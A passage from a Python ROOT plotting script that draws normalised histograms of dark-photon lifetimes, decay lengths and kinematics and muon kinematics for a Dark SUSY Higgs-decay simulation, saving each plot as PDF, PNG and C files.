#legend.SetFillColor(ROOT.kWhite)
#legend.SetFillStyle(0)
#legend.SetBorderSize(0)
#legend.SetTextFont(42)
#legend.SetTextSize(0.02777778)
#legend.SetMargin(0.13)
#legend.AddEntry(h_nD_1_M,"1st n_{D} (leading p_{T})","L")
#legend.AddEntry(h_nD_2_M,"2nd n_{D}","L")
#legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_nD_M.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_nD_M.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_nD_M.C")
h_gammaD_cT_dummy.Draw()
normConstant = integral(h_gammaD_cT)
#print normConstant
h_gammaD_cT.Scale(1/normConstant)
h_gammaD_cT.Draw("same")
scaleAxisYcT(h_gammaD_cT,h_gammaD_cT_dummy)
funct = ROOT.TF1("funct","exp(-x/"+ lifetime_GammaD_Legend +")/("+ lifetime_GammaD_Legend + "*(1 - exp(-" + str(cTlim) + "/" + lifetime_GammaD_Legend + ")))",cTlow,cTlim)
funct.SetNpx(10000)
funct.Draw("same")
h_gammaD_cT.SetTitleOffset(1.5, "Y")
h_gammaD_cT.SetXTitle("c#tau of #gamma_{D} [mm]")
h_gammaD_cT.SetYTitle("Normalized Fraction of events")
h_gammaD_cT.SetTitleSize(0.05,"Y")
info.Draw()
txtHeader.Draw()
eqn = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
eqn.SetFillColor(ROOT.kWhite)
eqn.SetFillStyle(0)
eqn.SetBorderSize(0)
eqn.SetTextFont(42)
eqn.SetTextSize(0.02777778)
eqn.SetMargin(0.13)
eqn.AddEntry(funct, "#frac{e^{-x/"+ lifetime_GammaD_Legend +"}}{"+ lifetime_GammaD_Legend + " (1 - e^{-" + str(cTlim) + "/" + lifetime_GammaD_Legend + "})}", "L")
eqn.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_cT.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_cT.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_cT.C")
h_gammaD_cT_lab_dummy.Draw()
normConstant = integral(h_gammaD_cT_lab)
h_gammaD_cT_lab.Scale(1/normConstant)
h_gammaD_cT_lab.Draw("same")
scaleAxisYcT(h_gammaD_cT_lab,h_gammaD_cT_lab_dummy)
#h_gammaD_cT_lab.DrawNormalized("same")
#myfit = ROOT.TF1("myfit", "[0]*exp(-x/[1])", 0, 10)
#myfit.SetParName(0,"C")
#myfit.SetParName(1,"L")
#myfit.SetParameter(0,1)
#myfit.SetParameter(1,1)
#h_gammaD_cT_lab.Fit("myfit").Draw("same")
h_gammaD_cT_lab.SetTitleOffset(1.5, "Y")
h_gammaD_cT_lab.SetXTitle("L of #gamma_{D} [mm]")
h_gammaD_cT_lab.SetYTitle("Events")
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_L.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_L.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_L.C")
h_gammaD_cT_XY_lab_dummy.Draw()
normConstant = integral(h_gammaD_cT_XY_lab)
h_gammaD_cT_XY_lab.Scale(1/normConstant)
h_gammaD_cT_XY_lab.Draw("same")
scaleAxisYcT(h_gammaD_cT_XY_lab,h_gammaD_cT_XY_lab_dummy)
#h_gammaD_cT_XY_lab.DrawNormalized("same")
#myfit = ROOT.TF1("myfit", "[0]*exp(-x/[1])", 0, 10)
#myfit.SetParName(0,"C")
#myfit.SetParName(1,"L_{xy}")
#myfit.SetParameter(0,1)
#myfit.SetParameter(1,1)
#h_gammaD_cT_XY_lab.Fit("myfit").Draw("same")
h_gammaD_cT_XY_lab.SetTitleOffset(1.5, "Y")
h_gammaD_cT_XY_lab.SetXTitle("L_{xy} of #gamma_{D} [mm]")
h_gammaD_cT_XY_lab.SetYTitle("Events")
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_L_XY.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_L_XY.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_L_XY.C")
h_gammaD_cT_Z_lab_dummy.Draw()
normConstant = integral(h_gammaD_cT_Z_lab)
h_gammaD_cT_Z_lab.Scale(1/normConstant)
h_gammaD_cT_Z_lab.Draw("same")
scaleAxisYcT(h_gammaD_cT_Z_lab,h_gammaD_cT_Z_lab_dummy)
#h_gammaD_cT_Z_lab.DrawNormalized("same")
#myfit = ROOT.TF1("myfit", "[0]*exp(-x/[1])", 0, 10)
#myfit.SetParName(0,"C")
#myfit.SetParName(1,"L_{z}")
#myfit.SetParameter(0,1)
#myfit.SetParameter(1,1)
#h_gammaD_cT_Z_lab.Fit("myfit").Draw("same")
h_gammaD_cT_Z_lab.SetTitleOffset(1.5, "Y")
h_gammaD_cT_Z_lab.SetXTitle("L_{z} of #gamma_{D} [mm]")
h_gammaD_cT_Z_lab.SetYTitle("Events")
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_L_Z.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_L_Z.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_L_Z.C")
h_gammaD_1_cT_dummy.Draw()
normConstant = integral(h_gammaD_1_cT)
h_gammaD_1_cT.Scale(1/normConstant)
h_gammaD_1_cT.Draw("same")
normConstant2 = integral(h_gammaD_2_cT)
h_gammaD_2_cT.Scale(1/normConstant2)
h_gammaD_2_cT.Draw("same")
scaleAxisYcT(h_gammaD_2_cT,h_gammaD_1_cT_dummy)
#h_gammaD_1_cT.DrawNormalized("same")
#h_gammaD_2_cT.DrawNormalized("same")
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_gammaD_1_cT,"1st dark photon (leading p_{T})","L")
legend.AddEntry(h_gammaD_2_cT,"2nd dark photon","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_Sorted_cT.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_Sorted_cT.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_Sorted_cT.C")
h_gammaD_1_cT_lab_dummy.Draw()
normConstant = integral(h_gammaD_1_cT_lab)
h_gammaD_1_cT_lab.Scale(1/normConstant)
h_gammaD_1_cT_lab.Draw("same")
normConstant2 = integral(h_gammaD_2_cT_lab)
h_gammaD_2_cT_lab.Scale(1/normConstant2)
h_gammaD_2_cT_lab.Draw("same")
scaleAxisYcT(h_gammaD_2_cT_lab,h_gammaD_1_cT_lab_dummy)
#h_gammaD_1_cT_lab.DrawNormalized("same")
#h_gammaD_2_cT_lab.DrawNormalized("same")
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_gammaD_1_cT_lab,"1st dark photon (leading p_{T})","L")
legend.AddEntry(h_gammaD_2_cT_lab,"2nd dark photon","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_Sorted_cT_lab.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_Sorted_cT_lab.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_Sorted_cT_lab.C")
h_gammaD_1_cT_XY_lab_dummy.Draw()
normConstant = integral(h_gammaD_1_cT_XY_lab)
h_gammaD_1_cT_XY_lab.Scale(1/normConstant)
h_gammaD_1_cT_XY_lab.Draw("same")
normConstant2 = integral(h_gammaD_2_cT_XY_lab)
h_gammaD_2_cT_XY_lab.Scale(1/normConstant2)
h_gammaD_2_cT_XY_lab.Draw("same")
scaleAxisYcT(h_gammaD_2_cT_XY_lab,h_gammaD_1_cT_XY_lab_dummy)
#h_gammaD_1_cT_XY_lab.DrawNormalized("same")
#h_gammaD_2_cT_XY_lab.DrawNormalized("same")
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_gammaD_1_cT_XY_lab,"1st dark photon (leading p_{T})","L")
legend.AddEntry(h_gammaD_2_cT_XY_lab,"2nd dark photon","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_Sorted_cT_XY_lab.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_Sorted_cT_XY_lab.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_Sorted_cT_XY_lab.C")
h_gammaD_1_cT_Z_lab_dummy.Draw()
normConstant = integral(h_gammaD_1_cT_Z_lab)
h_gammaD_1_cT_Z_lab.Scale(1/normConstant)
h_gammaD_1_cT_Z_lab.Draw("same")
normConstant2 = integral(h_gammaD_2_cT_Z_lab)
h_gammaD_2_cT_Z_lab.Scale(1/normConstant2)
h_gammaD_2_cT_Z_lab.Draw("same")
scaleAxisYcT(h_gammaD_2_cT_Z_lab,h_gammaD_1_cT_Z_lab_dummy)
#h_gammaD_1_cT_Z_lab.DrawNormalized("same")
#h_gammaD_2_cT_Z_lab.DrawNormalized("same")
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_gammaD_1_cT_Z_lab,"1st dark photon (leading p_{T})","L")
legend.AddEntry(h_gammaD_2_cT_Z_lab,"2nd dark photon","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_Sorted_cT_Z_lab.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_Sorted_cT_Z_lab.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_Sorted_cT_Z_lab.C")
h_gammaD_1_pT_dummy.Draw()
h_gammaD_1_pT.DrawNormalized("same")
h_gammaD_2_pT.DrawNormalized("same")
scaleAxisY(h_gammaD_2_pT,h_gammaD_1_pT_dummy)
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_gammaD_1_pT,"1st dark photon (leading p_{T})","L")
legend.AddEntry(h_gammaD_2_pT,"2nd dark photon","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_pT.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_pT.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_pT.C")
h_gammaD_1_pZ_dummy.Draw()
#plotOverflow(h_gammaD_1_pZ)
#plotOverflow(h_gammaD_2_pZ)
h_gammaD_1_pZ.DrawNormalized("same")
h_gammaD_2_pZ.DrawNormalized("same")
scaleAxisY(h_gammaD_2_pZ,h_gammaD_1_pZ_dummy)
#htmp = ROOT.TH1F(h_gammaD_1_pZ.GetName(),h_gammaD_1_pZ.GetTitle(), h_gammaD_1_pZ.GetNbinsX()+1, h_gammaD_1_pZ.GetBinLowEdge(1), h_gammaD_1_pZ.GetBinLowEdge(h_gammaD_1_pZ.GetNbinsX()+1)+h_gammaD_1_pZ.GetBinWidth(h_gammaD_1_pZ.GetNbinsX()+1))
#for i in range(1, h_gammaD_1_pZ.GetNbinsX()+1 ):
# htmp.Fill(htmp.GetBinCenter(i), h_gammaD_1_pZ.GetBinContent(i))
#htmp.Fill(h_gammaD_1_pZ.GetNbinsX()-1, h_gammaD_1_pZ.GetBinContent(0))
#htmp.SetEntries(h_gammaD_1_pZ.GetEntries())
#htmp.SetLineColor(ROOT.kRed)
#htmp.DrawNormalized("same")
#htmp2 = ROOT.TH1F(h_gammaD_2_pZ.GetName(), h_gammaD_2_pZ.GetTitle(), h_gammaD_2_pZ.GetNbinsX()+1, h_gammaD_2_pZ.GetBinLowEdge(1), h_gammaD_2_pZ.GetBinLowEdge(h_gammaD_2_pZ.GetNbinsX()+1)+h_gammaD_2_pZ.GetBinWidth(h_gammaD_2_pZ.GetNbinsX()+1))
#for i in range(1, h_gammaD_2_pZ.GetNbinsX()+1 ):
# htmp2.Fill(htmp2.GetBinCenter(i), h_gammaD_2_pZ.GetBinContent(i))
#htmp2.Fill(h_gammaD_2_pZ.GetNbinsX()-1, h_gammaD_2_pZ.GetBinContent(0))
#htmp2.SetEntries(h_gammaD_2_pZ.GetEntries())
#htmp2.SetLineColor(ROOT.kBlue)
#htmp2.DrawNormalized("same")
#h_gammaD_1_pZ.DrawNormalized("same")
#h_gammaD_2_pZ.DrawNormalized("same")
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_gammaD_1_pZ,"1st dark photon (leading p_{T})","L")
legend.AddEntry(h_gammaD_2_pZ,"2nd dark photon","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_pZ.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_pZ.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_pZ.C")
h_gammaD_1_Eta_dummy.Draw()
h_gammaD_1_Eta.DrawNormalized("same")
h_gammaD_2_Eta.DrawNormalized("same")
scaleAxisY(h_gammaD_1_Eta,h_gammaD_1_Eta_dummy)
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_gammaD_1_Eta,"1st dark photon (leading p_{T})","L")
legend.AddEntry(h_gammaD_2_Eta,"2nd dark photon","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_Eta.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_Eta.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_Eta.C")
h_gammaD_1_Phi_dummy.Draw()
h_gammaD_1_Phi.DrawNormalized("same")
h_gammaD_2_Phi.DrawNormalized("same")
scaleAxisY(h_gammaD_1_Phi,h_gammaD_1_Phi_dummy)
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_gammaD_1_Phi,"1st dark photon (leading p_{T})","L")
legend.AddEntry(h_gammaD_2_Phi,"2nd dark photon","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_Phi.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_Phi.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_Phi.C")
h_gammaD_1_p_dummy.Draw()
plotOverflow(h_gammaD_1_p)
plotOverflow(h_gammaD_2_p)
scaleAxisY(h_gammaD_2_p,h_gammaD_1_p_dummy)
#h_gammaD_1_p.DrawNormalized("same")
#h_gammaD_2_p.DrawNormalized("same")
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_gammaD_1_p,"1st dark photon (leading p_{T})","L")
legend.AddEntry(h_gammaD_2_p,"2nd dark photon","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_p.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_p.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_p.C")
h_gammaD_1_M_dummy.Draw()
cnv.SetLogx()
h_gammaD_1_M.DrawNormalized("same")
#h_gammaD_2_M.DrawNormalized("same")
#legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
#legend.SetFillColor(ROOT.kWhite)
#legend.SetFillStyle(0)
#legend.SetBorderSize(0)
#legend.SetTextFont(42)
#legend.SetTextSize(0.02777778)
#legend.SetMargin(0.13)
#legend.AddEntry(h_gammaD_1_M,"1st dark photon (leading p_{T})","L")
#legend.AddEntry(h_gammaD_2_M,"2nd dark photon","L")
#legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_M.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_M.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_M.C")
cnv.SetLogx(0)
h_muon_pT_dummy.Draw()
h_muon_pT_0.DrawNormalized("same")
h_muon_pT_1.DrawNormalized("same")
h_muon_pT_2.DrawNormalized("same")
h_muon_pT_3.DrawNormalized("same")
scaleAxisY(h_muon_pT_3,h_muon_pT_dummy)
legend = ROOT.TLegend(0.6175166,0.6730435,0.9429047,0.7626087)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_muon_pT_0,"1st muon (leading p_{T})","L")
legend.AddEntry(h_muon_pT_1,"2nd muon","L")
legend.AddEntry(h_muon_pT_2,"3rd muon","L")
legend.AddEntry(h_muon_pT_3,"4th muon","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_muon_pT.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_muon_pT.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_muon_pT.C")
h_muon_phi_dummy.Draw()
h_muon_phi_0.DrawNormalized("same")
h_muon_phi_1.DrawNormalized("same")
h_muon_phi_2.DrawNormalized("same")
h_muon_phi_3.DrawNormalized("same")
scaleAxisY(h_muon_phi_0,h_muon_phi_dummy)
legend = ROOT.TLegend(0.6175166,0.6730435,0.9429047,0.7626087)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_muon_phi_0,"1st muon (leading p_{T})","L")
legend.AddEntry(h_muon_phi_1,"2nd muon","L")
legend.AddEntry(h_muon_phi_2,"3rd muon","L")
legend.AddEntry(h_muon_phi_3,"4th muon","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_muon_phi.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_muon_phi.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_muon_phi.C")
h_muon_pZ_dummy.Draw()
h_muon_pZ_0.DrawNormalized("same")
h_muon_pZ_1.DrawNormalized("same")
h_muon_pZ_2.DrawNormalized("same")
h_muon_pZ_3.DrawNormalized("same")
scaleAxisY(h_muon_pZ_3,h_muon_pZ_dummy)
legend = ROOT.TLegend(0.6175166,0.6730435,0.9429047,0.7626087)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_muon_pZ_0,"1st muon (leading p_{T})","L")
legend.AddEntry(h_muon_pZ_1,"2nd muon","L")
legend.AddEntry(h_muon_pZ_2,"3rd muon","L")
legend.AddEntry(h_muon_pZ_3,"4th muon","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_muon_pZ.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_muon_pZ.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_muon_pZ.C")
h_muon_p_dummy.Draw()
h_muon_p_0.DrawNormalized("same")
h_muon_p_1.DrawNormalized("same")
h_muon_p_2.DrawNormalized("same")
h_muon_p_3.DrawNormalized("same")
scaleAxisY(h_muon_p_3,h_muon_p_dummy)
legend = ROOT.TLegend(0.6175166,0.6730435,0.9429047,0.7626087)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_muon_p_0,"1st muon (leading p_{T})","L")
legend.AddEntry(h_muon_p_1,"2nd muon","L")
legend.AddEntry(h_muon_p_2,"3rd muon","L")
legend.AddEntry(h_muon_p_3,"4th muon","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_muon_p.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_muon_p.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_muon_p.C")
h_muon_eta_dummy.Draw()
h_muon_eta_0.DrawNormalized("same")
h_muon_eta_1.DrawNormalized("same")
h_muon_eta_2.DrawNormalized("same")
h_muon_eta_3.DrawNormalized("same")
scaleAxisY(h_muon_eta_0,h_muon_eta_dummy)
legend = ROOT.TLegend(0.6175166,0.6730435,0.9429047,0.7626087)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_muon_eta_0,"1st muon (leading p_{T})","L")
legend.AddEntry(h_muon_eta_1,"2nd muon","L")
legend.AddEntry(h_muon_eta_2,"3rd muon","L")
legend.AddEntry(h_muon_eta_3,"4th muon","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_muon_eta.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_muon_eta.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_muon_eta.C")
#h_dimuon_m_dummy.Draw()
#h_dimuon_m_0.DrawNormalized("same")
#h_dimuon_m_1.DrawNormalized("same")
#h_dimuon_m_2.DrawNormalized("same")
#h_dimuon_m_3.DrawNormalized("same")
#
#legend = ROOT.TLegend(0.6175166,0.6730435,0.9429047,0.7626087)
#legend.SetFillColor(ROOT.kWhite)
#legend.SetFillStyle(0)
#legend.SetBorderSize(0)
#legend.SetTextFont(42)
#legend.SetTextSize(0.02777778)
#legend.SetMargin(0.13)
#legend.AddEntry(h_dimuon_m_0,"1st dimuon (leading m_{#mu#mu})","L")
#legend.AddEntry(h_dimuon_m_1,"2nd dimuon","L")
#legend.AddEntry(h_dimuon_m_2,"3rd dimuon","L")
#legend.AddEntry(h_dimuon_m_3,"4th dimuon","L")
#legend.Draw()
#info.Draw()
#txtHeader.Draw()
#cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_m.pdf")
#cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_m.png")
## convert -define.pdf:use-cropbox=true -density 300 CSxBR_vs_mh.pdf -resize 900x900 CSxBR_vs_mh.png
#
#h_dimuon_m_log_dummy.Draw()
#cnv.SetLogy()
#h_dimuon_m_log_0.DrawNormalized("same")
#h_dimuon_m_log_1.DrawNormalized("same")
#h_dimuon_m_log_2.DrawNormalized("same")
#h_dimuon_m_log_3.DrawNormalized("same")
#
#legend = ROOT.TLegend(0.6175166,0.6730435,0.9429047,0.7626087)
#legend.SetFillColor(ROOT.kWhite)
#legend.SetFillStyle(0)
#legend.SetBorderSize(0)
#legend.SetTextFont(42)
#legend.SetTextSize(0.02777778)
#legend.SetMargin(0.13)
#legend.AddEntry(h_dimuon_m_log_0,"1st dimuon (leading m_{#mu#mu})","L")
#legend.AddEntry(h_dimuon_m_log_1,"2nd dimuon","L")
#legend.AddEntry(h_dimuon_m_log_2,"3rd dimuon","L")
#legend.AddEntry(h_dimuon_m_log_3,"4th dimuon","L")
#legend.Draw()
#info.Draw()
#txtHeader.Draw()
#
#cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_m_log.pdf")
#cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_m_log.png")
#cnv.SetLogy(0)
#
#h_dimuon_m_real_fake_dummy.Draw()
#h_dimuon_m_real_fake_0.DrawNormalized("same")
